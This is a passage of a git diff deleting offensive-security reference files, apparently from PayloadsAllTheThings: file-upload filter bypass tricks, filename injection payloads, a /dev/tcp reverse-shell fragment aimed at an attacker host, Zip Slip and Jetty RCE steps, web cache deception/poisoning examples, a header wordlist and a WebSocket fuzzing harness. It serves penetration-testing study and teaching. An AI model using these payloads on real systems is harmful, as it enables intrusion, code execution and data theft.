```powershell - .asp - .aspx - .config - .cer and .asa # (IIS <= 7.5) - shell.aspx;1.jpg # (IIS < 7.0) - shell.soap - ``` -* JSP : `.jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action`s -* Perl: `.pl, .pm, .cgi, .lib` -* Coldfusion: `.cfm, .cfml, .cfc, .dbm` - -### Upload tricks - -- Use double extensions : `.jpg.php, .png.php5` -- Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg` -- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr` -- Null byte (works well against `pathinfo()`) - * `.php%00.gif` - * `.php\x00.gif` - * `.php%00.png` - * `.php\x00.png` - * `.php%00.jpg` - * `.php\x00.jpg` -- Special characters - * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed. - * Whitespace and new line characters - * `file.php%20` - * `file.php%0d%0a.jpg` - * `file.php%0a` - * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`. - * Slash: `file.php/`, `file.php.\`, `file.j\sp`, `file.j/sp` - * Multiple special characters: `file.jsp/././././.` -- Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif` - * `Content-Type : image/gif` - * `Content-Type : image/png` - * `Content-Type : image/jpeg` - * Content-Type wordlist: [SecLists/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/web/content-type.txt) - * Set the Content-Type twice: once for unallowed type and once for allowed. -- [Magic Bytes](https://en.wikipedia.org/wiki/List_of_file_signatures) - * Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application. - * PNG: `\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[` - * JPG: `\xff\xd8\xff` - * GIF: `GIF87a` OR `GIF8;` - * Shell can also be added in the metadata -- Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "`file.asax:.jpg`"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "`file.asp::$data.`") - -### Filename vulnerabilities - -Sometimes the vulnerability is not the upload but how the file is handled after. You might want to upload files with payloads in the filename. - -- Time-Based SQLi Payloads: e.g. `poc.js'(select*from(select(sleep(20)))a)+'.extension` -- LFI/Path Traversal Payloads: e.g. `image.png../../../../../../../etc/passwd` -- XSS Payloads e.g. `'">.extension` -- File Traversal e.g. `../../../tmp/lol.png` -- Command Injection e.g. `; sleep 10;` - -Also you upload: -- HTML/SVG files to trigger an XSS -- EICAR file to check the presence of an antivirus - -### Picture Compression - -Create valid pictures hosting PHP code. Upload the picture and use a **Local File Inclusion** to execute the code. The shell can be called with the following command : `curl 'http://localhost/test.php?0=system' --data "1='ls'"`. - -- Picture Metadata, hide the payload inside a comment tag in the metadata. -- Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating `getimagesize()` and `imagecreatefromgif()`. - - [JPG](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l): use createBulletproofJPG.py - - [PNG](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createPNGwithPLTE.php - - [GIF](https://blog.isec.pl/injection-points-in-popular-image-formats/): use createGIFwithGlobalColorTable.php - - -### Picture with custom metadata - -Create a custom picture and insert exif tag with `exiftool`. A list of multiple exif tags can be found at [exiv2.org](https://exiv2.org/tags.html) - -```ps1 -convert -size 110x110 xc:white payload.jpg -exiftool -Copyright="PayloadsAllTheThings" -Artist="Pentest" -ImageUniqueID="Example" payload.jpg -exiftool -Comment="& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)' -pop graphic-context -``` - -More payload in the folder `Picture Image Magik` - -### CVE - FFMpeg - -FFmpeg HLS vulnerability - - -### ZIP archive - -When a ZIP/archive file is automatically decompressed after the upload - -* Zip Slip: directory traversal to write a file somewhere else - ```python - python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 - - ln -s ../../../index.php symindex.txt - zip --symlinks test.zip symindex.txt - ``` - -### Jetty RCE - -Upload the XML file to `$JETTY_BASE/webapps/` -* [JettyShell.xml - From Mikhail Klyuchnikov](https://raw.githubusercontent.com/Mike-n1/tips/main/JettyShell.xml) - -## Labs - -* [Portswigger Labs on File Uploads](https://portswigger.net/web-security/all-labs#file-upload-vulnerabilities) - - -## References - -* [Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil](https://virtualabs.fr/Nasty-bulletproof-Jpegs-l) -* [BookFresh Tricky File Upload Bypass to RCE, NOV 29, 2014 - AHMED ABOUL-ELA](https://secgeek.net/bookfresh-vulnerability/) -* [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/) -* [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/) -* [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf) -* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0) -* [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap) -* [Arbitrary File Upload Tricks In Java - pyn3rd](https://pyn3rd.github.io/2022/05/07/Arbitrary-File-Upload-Tricks-In-Java/) -* [File Upload - HackTricks](https://book.hacktricks.xyz/pentesting-web/file-upload) -* [Injection points in popular image formats - Daniel Kalinowski‌‌ - Nov 8, 2019](https://blog.isec.pl/injection-points-in-popular-image-formats/) -* [A tip for getting RCE in Jetty apps with just one XML file! - Aug 4, 2022 - PT SWARM / @ptswarm](https://twitter.com/ptswarm/status/1555184661751648256/) -* [Jetty Features for Hacking Web Apps - September 15, 2022 - Mikhail Klyuchnikov](https://swarm.ptsecurity.com/jetty-features-for-hacking-web-apps/) -* [Inyección de código en imágenes subidas y tratadas con PHP-GD - Spanish Resource - hackplayers](https://www.hackplayers.com/2020/03/inyeccion-de-codigo-en-imagenes-php-gd.html) -* [A New Vector For “Dirty” Arbitrary File Write to RCE - Doyensec - Maxence Schmitt and Lorenzo Stella](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html) diff --git a/Upload Insecure Files/Server Side Include/exec.shtml b/Upload Insecure Files/Server Side Include/exec.shtml deleted file mode 100644 index afaa009..0000000 --- a/Upload Insecure Files/Server Side Include/exec.shtml +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Server Side Include/include.shtml b/Upload Insecure Files/Server Side Include/include.shtml deleted file mode 100644 index b7599b9..0000000 --- a/Upload Insecure Files/Server Side Include/include.shtml +++ /dev/null @@ -1 +0,0 @@ - \ No newline at end of file diff --git a/Upload Insecure Files/Server Side Include/index.stm b/Upload Insecure Files/Server Side Include/index.stm deleted file mode 100644 index 73111e8..0000000 --- a/Upload Insecure Files/Server Side Include/index.stm +++ /dev/null @@ -1,14 +0,0 @@ - - - - - - - - - - - - - - diff --git a/Upload Insecure Files/Zip Slip/README.md b/Upload Insecure Files/Zip Slip/README.md deleted file mode 100644 index 75b5dd6..0000000 --- a/Upload Insecure Files/Zip Slip/README.md +++ /dev/null @@ -1,37 +0,0 @@ -# Zip Slip - -> The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../shell.php). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. - -## Summary - -* [Detection](#detection) -* [Tools](#tools) -* [Exploits](#exploits) - * [Basic Exploit](#basic-exploit) -* [Additional Notes](#additional-notes) - -## Detection - -- Any zip upload page on the application - -## Tools - -- [evilarc](https://github.com/ptoomey3/evilarc) -- [slipit](https://github.com/usdAG/slipit) - -## Exploits - -### Basic Exploit - -Using evilarc: -```python -python evilarc.py shell.php -o unix -f shell.zip -p var/www/html/ -d 15 -``` - -### Additional Notes -- For affected libraries and projects, visit https://github.com/snyk/zip-slip-vulnerability - -## References - -- [Zip Slip Vulnerability - Snyk Ltd, 2019](https://snyk.io/research/zip-slip-vulnerability) -- [Zip Slip - snyk, 2019](https://github.com/snyk/zip-slip-vulnerability) diff --git a/Web Cache Deception/Intruders/param_miner_lowercase_headers.txt b/Web Cache Deception/Intruders/param_miner_lowercase_headers.txt deleted file mode 100644 index 16f1175..0000000 --- a/Web Cache Deception/Intruders/param_miner_lowercase_headers.txt +++ /dev/null @@ -1,1127 +0,0 @@ -accept -accept-application -accept-charset -accepted -accept-encoding -accept-encodxng -accept-language -accept-ranges -accept-version -access-control-allow-credentials -access-control-allow-headers -access-control-allow-methods -access-control-allow-origin -access-control-expose-headers -access-control-max-age -access-control-request-headers -access-control-request-method -accesskey -access-token -action -admin -age -ajax -akamai-origin-hop -allow -alt-used -app -appcookie -app-env -app-key -apply-to-redirect-ref -appname -appversion -atcept-language -auth -auth-any -auth-basic -auth-digest -auth-digest-ie -authentication -auth-gssneg -auth-key -auth-ntlm -authorization -auth-password -auth-realm -auth-type -auth-user -bad-gateway -bad-request -bae-env-addr-bcms -bae-env-addr-bcs -bae-env-addr-bus -bae-env-addr-channel -bae-env-addr-sql-ip -bae-env-addr-sql-port -bae-env-ak -bae-env-appid -bae-env-sk -bae-logid -bar -base -base-url -basic -bearer-indication -body-maxlength -body-truncated -brief -browser-user-agent -cache-control -cache-info -case-files -catalog -catalog-server -category -cert-cookie -cert-flags -cert-issuer -cert-keysize -cert-secretkeysize -cert-serialnumber -cert-server-issuer -cert-server-subject -cert-subject -cf-connecting-ip -cf-ipcountry -cf-template-path -cf-visitor -ch -challenge-response -charset -chunk-size -client -client-address -clientaddress -client-bad-request -client-conflict -client-error-cannot-access-local-file -client-error-cannot-connect -client-error-communication-failure -client-error-connect -client-error-invalid-parameters -client-error-invalid-server-address -client-error-no-error -client-error-protocol-failure -client-error-unspecified-error -client-expectation-failed -client-forbidden -client-gone -client-ip -clientip -client-length-required -client-method-not-allowed -client-not-acceptable -client-not-found -client-payment-required -client-precondition-failed -client-proxy-auth-required -client-quirk-mode -client-requested-range-not-possible -client-request-timeout -client-request-too-large -client-request-uri-too-large -client-unauthorized -client-unsupported-media-type -cloudfront-viewer-country -cloudinary-name -cloudinary-public-id -cloudinaryurl -cloudinary-version -code -coming-from -command -compress -conflict -connection -connection-type -contact -content -content-disposition -content-encoding -content-language -content-length -content-location -content-md5 -content-range -content-security-policy -content-security-policy-report-only -content-type -content-type-xhtml -context-path -continue -cookie -cookie2 -cookie-domain -cookie-httponly -cookie-parse-raw -cookie-path -cookies -cookie-secure -cookie-vars -core-base -created -credentials-filepath -curl -curl-multithreaded -custom-header -custom-secret-header -dataserviceversion -date -debug -deflate-level-def -deflate-level-max -deflate-level-min -deflate-strategy-def -deflate-strategy-filt -deflate-strategy-fixed -deflate-strategy-huff -deflate-strategy-rle -deflate-type-gzip -deflate-type-raw -deflate-type-zlib -delete -depth -destination -destroy -devblocksproxybase -devblocksproxyhost -devblocksproxyssl -device-stock-ua -digest -dir -dir-name -dir-resource -disable-gzip -dkim-signature -dnt -download-attachment -download-bad-url -download-bz2 -download-cut-short -download-e-headers-sent -download-e-invalid-archive-type -download-e-invalid-content-type -download-e-invalid-file -download-e-invalid-param -download-e-invalid-request -download-e-invalid-resource -download-e-no-ext-mmagic -download-e-no-ext-zlib -download-inline -download-mime-type -download-no-server -download-size -download-status-not-found -download-status-server-error -download-status-unauthorized -download-status-unknown -download-tar -download-tgz -download-url -download-zip -e-encoding -e-header -e-invalid-param -e-malformed-headers -e-message-type -enable-gzip -enable-no-cache-headers -encoding-stream-flush-full -encoding-stream-flush-none -encoding-stream-flush-sync -env-silla-environment -env-vars -e-querystring -e-request -e-request-method -e-request-pool -e-response -error -error-1 -error-2 -error-3 -error-4 -error-formatting-html -e-runtime -e-socket -espo-authorization -espo-cgi-auth -etag -e-url -eve-charid -eve-charname -eve-solarsystemid -eve-solarsystemname -eve-trusted -ex-copy-movie -expect -expectation-failed -expires -ext -failed-dependency -fake-header -fastly-client-ip -fb-appid -fb-secret -filename -file-not-found -files -files-vars -fire-breathing-dragon -foo -foo-bar -forbidden -force-language -force-local-xhprof -format -forwarded -forwarded-for -forwarded-for-ip -forwarded-proto -from -fromlink -front-end-https -gateway-interface -gateway-time-out -get -get-vars -givenname -global-all -global-cookie -global-get -global-post -gone -google-code-project-hosting-hook-hmac -gzip-level -h0st -head -header -header-lf -header-status-client-error -header-status-informational -header-status-redirect -header-status-server-error -header-status-successful -home -host -host~%h:%s -hosti -host-liveserver -host-name -host-unavailable -htaccess -http-accept -http-accept-encoding -http-accept-language -http-authorization -http-connection -http-cookie -http-host -http-phone-number -http-referer -https -https-from-lb -https-keysize -http_sm_authdirname -http_sm_authdirnamespace -http_sm_authdiroid -http_sm_authdirserver -http_sm_authreason -http_sm_authtype -http_sm_dominocn -http_sm_realm -http_sm_realmoid -http_sm_sdomain -http_sm_serveridentityspec -http_sm_serversessionid -http_sm_serversessionspec -http_sm_sessiondrift -http_sm_timetoexpire -http_sm_transactionid -http_sm_universalid -http_sm_user -http_sm_userdn -http_sm_usermsg -https-secretkeysize -https-server-issuer -https-server-subject -http-url -http-user-agent -if -if-match -if-modified-since -if-modified-since-version -if-none-match -if-posted-before -if-range -if-unmodified-since -if-unmodified-since-version -image -images -incap-client-ip -info -info-download-size -info-download-time -info-return-code -info-total-request-stat -info-total-response-stat -insufficient-storage -internal-server-error -ipresolve-any -ipresolve-v4 -ipresolve-v6 -ischedule-version -iv-groups -iv-user -jenkins -keep-alive -kiss-rpc -large-allocation -last-event-id -last-modified -length-required -link -local-addr -local-content-sha1 -local-dir -location -locked -lock-token -mail -max-conn -maxdataserviceversion -max-forwards -max-request-size -max-uri-length -message -message-b -meth- -meth-acl -meth-baseline-control -meth-checkin -meth-checkout -meth-connect -meth-copy -meth-delete -meth-get -meth-head -meth-label -meth-lock -meth-merge -meth-mkactivity -meth-mkcol -meth-mkworkspace -meth-move -method -method-not-allowed -meth-options -meth-post -meth-propfind -meth-proppatch -meth-put -meth-report -meth-trace -meth-uncheckout -meth-unlock -meth-update -meth-version-control -mimetype -modauth -mode -mod-env -mod-rewrite -mod-security-message -module-class -module-class-path -module-name -moved-permanently -moved-temporarily -ms-asprotocolversion -msg-none -msg-request -msg-response -msisdn -multipart-boundary -multiple-choices -multi-status -my-header -mysqlport -native-sockets -nl -no-content -non-authoritative -nonce -not-acceptable -not-exists -not-extended -not-found -notification-template -not-implemented -not-modified -oc-chunked -ocs-apirequest -ok -on-behalf-of -onerror-continue -onerror-die -onerror-return -opencart -options -organizer -origin -originator -origin~https://%s.%h -orig_path_info -overwrite -params-allow-comma -params-allow-failure -params-default -params-get-catid -params-get-currentday -params-get-disposition -params-get-downwards -params-get-givendate -params-get-lang -params-get-type -params-raise-error -partial-content -passkey -password -path -path-base -path-info -path-themes -path-translated -payment-required -pc-remote-addr -phone-number -php -php-auth-pw -php-auth-user -phpthreads -pink-pony -port -portsensor-auth -post -post-error -post-files -postredir-301 -postredir-302 -postredir-all -post-vars -pragma -pragma-no-cache -precondition-failed -prefer -processing -profile -protocol -protocols -proxy -proxy-agent -proxy-authenticate -proxy-authentication-required -proxy-authorization -proxy-connection -proxy-host -proxy-http -proxy-http-1-0 -proxy-password -proxy-port -proxy-pwd -proxy-request-fulluri -proxy-socks4 -proxy-socks4a -proxy-socks5 -proxy-socks5-hostname -proxy-url -proxy-user -public-key-pins -public-key-pins-report-only -pull -put -query-string -querystring -querystring-type-array -querystring-type-bool -querystring-type-float -querystring-type-int -querystring-type-object -querystring-type-string -range -range-not-satisfiable -raw-post-data -read-state-begin -read-state-body -read-state-headers -real-ip -real-method -reason -reason-phrase -recipient -redirect -redirected-accept-language -redirect-found -redirection-found -redirection-multiple-choices -redirection-not-modified -redirection-permanent -redirection-see-other -redirection-temporary -redirection-unused -redirection-use-proxy -redirect-perm -redirect-post -redirect-problem-withoutwww -redirect-problem-withwww -redirect-proxy -redirect-temp -ref -referer -referer -referer~http://%s.%h/ -referrer -referrer-policy -refferer -refresh -remix-hash -remote-addr -remote-host -remote-host-wp -remote-user -remote-userhttps -report-to -request -request2-tests-base-url -request2-tests-proxy-host -request-entity-too-large -request-error -request-error-file -request-error-gzip-crc -request-error-gzip-data -request-error-gzip-method -request-error-gzip-read -request-error-proxy -request-error-redirects -request-error-response -request-error-url -request-http-ver-1-0 -request-http-ver-1-1 -request-mbstring -request-method -request-method- -request-method-delete -request-method-get -request-method-head -request-method-options -request-method-post -request-method-put -request-method-trace -request-time-out -request-timeout -requesttoken -__requesturi -request-uri -request-uri-too-large -request-vars -__requestverb -reset-content -response -rest-key -rest-sign -retry-after -returned-error -rlnclientipaddr -root -safe-ports-list -safe-ports-ssl-list -schedule-reply -scheme -script-name -secretkey -sec-websocket-accept -sec-websocket-extensions -sec-websocket-key -sec-websocket-key1 -sec-websocket-key2 -sec-websocket-origin -sec-websocket-protocol -sec-websocket-version -see-other -self -send-x-frame-options -server -server-bad-gateway -server-error -server-gateway-timeout -server-internal -server-name -server-not-implemented -server-port -server-port-secure -server-protocol -server-service-unavailable -server-software -server-unsupported-version -server-vars -server-varsabantecart -service-unavailable -session-id-tag -session-vars -set-cookie -set-cookie2 -shib- -shib-application-id -shib-identity-provider -shib-logouturl -shopilex -slug -sn -soapaction -socket-connection-err -socketlog -somevar -sourcemap -sp-client -sp-host -ssl -ssl-https -ssl-offloaded -ssl-session-id -sslsessionid -ssl-version-any -status -status- -status-403 -status-403-admin-del -status-404 -status-bad-request -status-code -status-forbidden -status-ok -status-platform-403 -strict-transport-security -str-match -success-accepted -success-created -success-no-content -success-non-authoritative -success-ok -success-partial-content -success-reset-content -support -support-encodings -support-events -support-magicmime -support-requests -support-sslrequests -surrogate-capability -switching-protocols -te -temporary-redirect -test -test-config -test-server-path -test-something-anything -ticket -time-out -timeout -timing-allow-origin -title -tk -tmp -token -trailer -transfer-encoding -translate -transport-err -true-client-ip -ua -ua-color -ua-cpu -ua-os -ua-pixels -ua-resolution -ua-voice -unauthorized -unencoded-url -unit-test-mode -unless-modified-since -unprocessable-entity -unsupported-media-type -upgrade -upgrade-insecure-requests -upgrade-required -upload-default-chmod -uri -url -url-from-env -url-join-path -url-join-query -url-replace -url-sanitize-path -url-strip- -url-strip-all -url-strip-auth -url-strip-fragment -url-strip-pass -url-strip-path -url-strip-port -url-strip-query -url-strip-user -use-gzip -use-proxy -user -user-agent -useragent -user-agent-via -useragent-via -user-email -user-id -user-mail -user-name -user-photos -util -variant-also-varies -vary -verbose -verbose-throttle -verify-cert -version -version-1-0 -version-1-1 -version-any -versioncode -version-none -version-not-supported -via -viad -wap-connection -warning -webodf-member-id -webodf-session-id -webodf-session-revision -web-server-api -work-directory -www-address -www-authenticate -x -x- -x-aastra-expmod1 -x-aastra-expmod2 -x-aastra-expmod3 -x-accel-mapping -x-access-token -x-advertiser-id -x-ajax-real-method -x-alto-ajax-keyz -x-amz-date -x-amzn-remapped-host -x-amz-website-redirect-location -x-api-key -x-api-signature -x-api-timestamp -x-apitoken -x-apple-client-application -x-apple-store-front -x-arr-log-id -x-arr-ssl -x-att-deviceid -x-authentication -x-authentication-key -x-auth-key -x-auth-mode -x-authorization -xauthorization -x-auth-password -x-auth-service-provider -x-auth-token -x-auth-user -x-auth-userid -x-auth-username -x-avantgo-screensize -x-azc-remote-addr -x-bear-ajax-request -x-bluecoat-via -x-bolt-phone-ua -x-browser-height -x-browser-width -x-cascade -x-cept-encoding -x-cf-url -x-chrome-extension -x-cisco-bbsm-clientip -x-client-host -x-client-id -x-client-ip -x-clientip -x-client-key -x-client-os -x-client-os-ver -x-cluster-client-ip -x-codeception-codecoverage -x-codeception-codecoverage-config -x-codeception-codecoverage-debug -x-codeception-codecoverage-suite -x-collect-coverage -x-coming-from -x-confirm-delete -x-content-type -x-content-type-options -x-credentials-request -x-csrf-crumb -x-csrf-token -x-csrftoken -x-cuid -x-custom -x-dagd-proxy -x-davical-testcase -x-dcmguid -x-debug-test -x-device-user-agent -x-dialog -x-dns-prefetch-control -x-dokuwiki-do -x-do-not-track -x-drestcg -x-dsid -x-elgg-apikey -x-elgg-hmac -x-elgg-hmac-algo -x-elgg-nonce -x-elgg-posthash -x-elgg-posthash-algo -x-elgg-time -x-em-uid -x-enable-coverage -x-environment-override -x-expected-entity-length -x-experience-api-version -x-fb-user-remote-addr -x-file-id -x-file-name -x-filename -x-file-resume -x-file-size -x-file-type -x-firelogger -x-fireloggerauth -x-firephp-version -x-flash-version -x-flx-consumer-key -x-flx-consumer-secret -x-flx-redirect-url -x-foo -x-foo-bar -x-forwarded -x-forwarded-by -x-forwarded-for -x-forwarded-for-original -x-forwarded-host -x-forwarded-host~%s.%h -x-forwarded-port -x-forwarded-proto -x-forwarded-protocol -x-forwarded-scheme -x-forwarded-server -x-forwarded-server~%s.%h -x-forwarded-ssl -x-forwarded-ssl -x-forwarder-for -x-forward-for -x-forward-proto -x-from -x-gb-shared-secret -x-geoip-country -x-get-checksum -x-helpscout-event -x-helpscout-signature -x-hgarg- -x-host -x-http-destinationurl -x-http-host-override -x-http-method -x-http-method-override -x-http-path-override -x-https -x-http-status-code-override -x-htx-agent -x-huawei-userid -x-hub-signature -x-if-unmodified-since -x-imbo-test-config -x-insight -x-ip -x-ip-trail -x-iwproxy-nesting -x-jphone-color -x-jphone-display -x-jphone-geocode -x-jphone-msname -x-jphone-uid -x-json -x-kaltura-remote-addr -x-known-signature -x-known-username -x-litmus -x-litmus-second -x-locking -x-machine -x-mandrill-signature -x-method-override -x-mobile-gateway -x-mobile-ua -x-mosso-dt -x-moz -x-msisdn -x-ms-policykey -x-myqee-system-debug -x-myqee-system-hash -x-myqee-system-isadmin -x-myqee-system-isrest -x-myqee-system-pathinfo -x-myqee-system-project -x-myqee-system-rstr -x-myqee-system-time -x-network-info -x-nfsn-https -x-ning-request-uri -x-nokia-bearer -x-nokia-connection-mode -x-nokia-gateway-id -x-nokia-ipaddress -x-nokia-msisdn -x-nokia-wia-accept-original -x-nokia-wtls -x-nuget-apikey -x-oc-mtime -xonnection -x-opera-info -x-operamini-features -x-operamini-phone -x-operamini-phone-ua -x-options -x-orange-id -x-orchestra-scheme -x-orig-client -x-original-host -x-original-http-command -x-originally-forwarded-for -x-originally-forwarded-proto -x-original-remote-addr -x-original-url -x-original-url~/%s -x-original-user-agent -x-originating-ip -x-os-prefs -x-overlay -x-pagelet-fragment -x-password -xpdb-debugger -x-phabricator-csrf -x-phpbb-using-plupload -x-pjax -x-pjax-container -x-prototype-version -xproxy -x-proxy-url -x-pswd -x-purpose -x-qafoo-profiler -x-real-ip -x-remote-addr -x-remote-protocol -x-render-partial -x-request -x-requested-with -x-request-id -x-request-signature -x-request-start -x-request-timestamp -x-response-format -x-rest-cors -x-rest-password -x-rest-username -x-rewrite-url -x-rewrite-url~/%s -xroxy-connection -x-sakura-forwarded-for -x-scalr-auth-key -x-scalr-auth-token -x-scalr-env-id -x-scheme -x-screen-height -x-screen-width -x-sendfile-type -x-serialize -x-serial-number -x-server-id -x-server-name -x-server-port -x-signature -x-sina-proxyuser -x-skyfire-phone -x-skyfire-screen -x-ssl -x-subdomain -x-te -x-teamsite-preremap -x-test-session-id -x-tine20-jsonkey -x-tine20-request-type -x-tomboy-client -x-tor -x-twilio-signature -x-ua-device -x-ucbrowser-device-ua -x-uidh -x-unique-id -x-uniquewcid -x-up-calling-line-id -x-update -x-update-range -x-up-devcap-iscolor -x-up-devcap-post-charset -x-up-devcap-screendepth -x-up-devcap-screenpixels -x-upload-maxresolution -x-upload-name -x-upload-size -x-upload-type -x-up-subno -x-url-scheme -x-user -x-user-agent -x-username -x-varnish -x-verify-credentials-authorization -x-vodafone-3gpdpcontext -x-wap-clientid -x-wap-client-sdu-size -x-wap-gateway -x-wap-network-client-ip -x-wap-network-client-msisdn -x-wap-profile -x-wap-proxy-cookie -x-wap-session-id -x-wap-tod -x-wap-tod-coded -x-whatever -x-wikimedia-debug -x-wp-nonce -x-wp-pjax-prefetch -x-ws-api-key -x-xc-schema-version -x-xhprof-debug -x-xhr-referer -x-xmlhttprequest -x-xpid -xxx-real-ip -xxxxxxxxxxxxxxx -x-zikula-ajax-token -x-zotero-version -x-ztgo-bearerinfo -y -zotero-api-version -zotero-write-token diff --git a/Web Cache Deception/README.md b/Web Cache Deception/README.md deleted file mode 100644 index 4171cd6..0000000 --- a/Web Cache Deception/README.md +++ /dev/null @@ -1,64 +0,0 @@ -# Web Cache Deception - -## Tools - -* [Param Miner - PortSwigger](https://github.com/PortSwigger/param-miner) - > This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities. - -## Exploit - -1. Browser requests `http://www.example.com/home.php/non-existent.css`. -2. Server returns the content of `http://www.example.com/home.php`, most probably with HTTP caching headers that instruct to not cache this page. -3. The response goes through the proxy. -4. The proxy identifies that the file has a css extension. -5. Under the cache directory, the proxy creates a directory named home.php, and caches the imposter "CSS" file (non-existent.css) inside. - -## Methodology of the attack - example - -1. Normal browsing, visit home : `https://www.example.com/myaccount/home/` -2. Open the malicious link : `https://www.example.com/myaccount/home/malicious.css` -3. The page is displayed as /home and the cache is saving the page -4. Open a private tab with the previous URL : `https://www.paypal.com/myaccount/home/malicous.css` -5. The content of the cache is displayed - -Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page -[![DEMO](https://i.vimeocdn.com/video/674856618.jpg)](https://vimeo.com/249130093) - -## Methodology 2 - -1. Find an un-keyed input for a Cache Poisoning - ```js - Values: User-Agent - Values: Cookie - Header: X-Forwarded-Host - Header: X-Host - Header: X-Forwarded-Server - Header: X-Forwarded-Scheme (header; also in combination with X-Forwarded-Host) - Header: X-Original-URL (Symfony) - Header: X-Rewrite-URL (Symfony) - ``` -2. Cache poisoning attack - Example for `X-Forwarded-Host` un-keyed input (remember to use a buster to only cache this webpage instead of the main page of the website) - ```js - GET /test?buster=123 HTTP/1.1 - Host: target.com - X-Forwarded-Host: test"> - - HTTP/1.1 200 OK - Cache-Control: public, no-cache - [..] - "> - ``` - -## Labs - -* [PortSwigger Labs for Web cache deception](https://portswigger.net/web-security/all-labs#web-cache-poisoning) - -## References - -* [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) -* [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) -* [Web Cache Entanglement: Novel Pathways to Poisoning - James Kettle @albinowax](https://portswigger.net/research/web-cache-entanglement) -* [Web Cache Deception Attack leads to user info disclosure - Kunal pandey - Feb 25](https://medium.com/@kunal94/web-cache-deception-attack-leads-to-user-info-disclosure-805318f7bb29) -* [Web cache poisoning - Web Security Academy learning materials](https://portswigger.net/web-security/web-cache-poisoning) - - [Exploiting cache design flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-design-flaws) - - [Exploiting cache implementation flaws](https://portswigger.net/web-security/web-cache-poisoning/exploiting-implementation-flaws) diff --git a/Web Sockets/Files/ws-harness.py b/Web Sockets/Files/ws-harness.py deleted file mode 100644 index 1fea6ec..0000000 --- a/Web Sockets/Files/ws-harness.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/python -from __future__ import print_function -import socket,ssl -from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer -from websocket import create_connection, WebSocket -from urlparse import parse_qs -import argparse -import os - -LOOP_BACK_PORT_NUMBER = 8000 - -def FuzzWebSocket(fuzz_value): - print(fuzz_value) - ws.send(ws_message.replace("[FUZZ]", str(fuzz_value[0]))) - result = ws.recv() - return result - -def LoadMessage(file): - file_contents = "" - try: - if os.path.isfile(file): - f = open(file,'r') - file_contents = f.read() - f.close() - except: - print("Error reading file: %s" % file) - exit() - return file_contents - -class myWebServer(BaseHTTPRequestHandler): - - #Handler for the GET requests - def do_GET(self): - qs = parse_qs(self.path[2:]) - fuzz_value = qs['fuzz'] - result = FuzzWebSocket(fuzz_value) - self.send_response(200) - self.send_header('Content-type','text/html') - self.end_headers() - self.wfile.write(result) - return - -parser = argparse.ArgumentParser(description='Web Socket Harness: Use traditional tools to assess web sockets') -parser.add_argument('-u','--url', help='The remote WebSocket URL to target.',required=True) -parser.add_argument('-m','--message', help='A file that contains the WebSocket message template to send. Please place [FUZZ] where injection is desired.',required=True) -args = parser.parse_args() - -ws_message = LoadMessage(args.message) - -ws = create_connection(args.url,sslopt={"cert_reqs": ssl.CERT_NONE},header={},http_proxy_host="", http_proxy_port=8080) - -try: - #Create a web server and define the handler to manage the - #incoming request - server = HTTPServer(('', LOOP_BACK_PORT_NUMBER), myWebServer) - print('Started httpserver on port ' , LOOP_BACK_PORT_NUMBER) - - #Wait forever for incoming http requests - server.serve_forever() - -except KeyboardInterrupt: - print('^C received, shutting down the web server') - server.socket.close() - ws.close() diff --git a/Web Sockets/Images/WebsocketHarness.jpg b/Web Sockets/Images/WebsocketHarness.jpg deleted file mode 100644 index 2657d6e..0000000 Binary files a/Web Sockets/Images/WebsocketHarness.jpg and /dev/null differ diff --git a/Web Sockets/Images/sqlmap.png b/Web Sockets/Images/sqlmap.png deleted file mode 100644 index 12b888c..0000000 Binary files a/Web Sockets/Images/sqlmap.png and /dev/null differ diff --git a/Web Sockets/Images/websocket-harness-start.png b/Web Sockets/Images/websocket-harness-start.png deleted file mode 100644 index 